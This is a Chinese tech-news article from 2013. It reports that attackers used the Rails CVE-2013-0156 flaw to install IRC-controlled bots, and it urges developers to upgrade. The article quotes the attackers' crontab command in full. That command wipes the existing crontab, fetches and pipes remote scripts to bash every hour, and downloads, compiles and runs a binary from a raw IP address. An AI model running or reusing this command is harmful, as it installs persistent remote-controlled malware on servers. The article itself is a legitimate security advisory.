Rails 老漏洞仍在肆虐,请尽快升级
查看次数2812 发表时间2013-05-30 13:07:33
| 安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。攻击者利用的是CVE-2013-0156这个安全漏洞... |
攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。
该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。
攻击者试图在crontab中添加如下命令(现在该命令已不可用):
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。
Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里。
目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。
Via jarmoc
(转发请注明转自:学PHP)
相关推荐
- 2013年度中国优秀开源项目征集活动正式启动 (2013-05-30 14:07:24)
- MIT 实验室开源相对论游戏引擎 OpenRelativity (2013-05-30 17:07:24)
- Linux Mint 15发布,关注度第1的Linux发行版 (2013-05-30 17:07:25)
- 现代开发工具(IDE)中的短板 (2013-05-30 18:07:27)
- 10 款强大绚丽的 jQuery/CSS3 特效 (2013-05-31 10:07:29)
- “互联网女皇”2013年趋势报告:移动增势迅猛 (2013-05-30 10:07:23)
- MongoDB 2.5 将提供新的查询引擎 (2013-05-30 10:07:23)
- 互联网女皇报告:移动设备仍有3-4倍的发展空间 (2013-05-30 09:49:53)
- json2html:将JSON对象转换为HTML (2013-05-29 18:07:41)
- 搭载 Blink 引擎的 Opera 浏览器亮相 (2013-05-29 17:07:36)
发表评论
